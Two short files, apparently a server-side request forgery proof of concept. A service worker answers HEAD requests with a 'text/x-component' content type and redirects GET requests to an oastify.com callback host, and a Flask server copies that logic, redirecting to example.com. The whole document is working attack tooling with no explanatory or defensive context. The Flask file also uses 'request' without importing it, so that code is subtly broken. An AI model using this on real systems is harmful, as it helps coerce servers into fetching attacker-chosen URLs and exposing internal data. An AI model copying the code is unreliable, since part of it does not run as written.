File: sw.js
self.addEventListener('fetch', event => {
    const request = event.request;

    // Intercept HEAD requests
    if (request.method === 'HEAD') {
        event.respondWith(
            new Response(null, {
                status: 200,
                headers: {
                    'Content-Type': 'text/x-component',
                }
            })
        );
    }
    // Intercept GET requests and redirect
    else if (request.method === 'GET') {
        event.respondWith(
            new Response(null, {
                status: 302,
                headers: {
                    'Location': 'http://yhjpg0spy3eip2gi9l69vyn16scj09oy.oastify.com/login',
                }
            })
        );
    }
});

File: sw.py
from flask import Flask, redirect, make_response

app = Flask(__name__)

@app.route('/', methods=['GET', 'HEAD'])
def handle_request():
    if request.method == 'HEAD':
        # Create a response for HEAD request
        response = make_response()
        response.headers['Content-Type'] = 'text/x-component'
        return response

    if request.method == 'GET':
        # Redirect for GET request
        return redirect("https://example.com", code=302)

if __name__ == '__main__':
    app.run(debug=True)
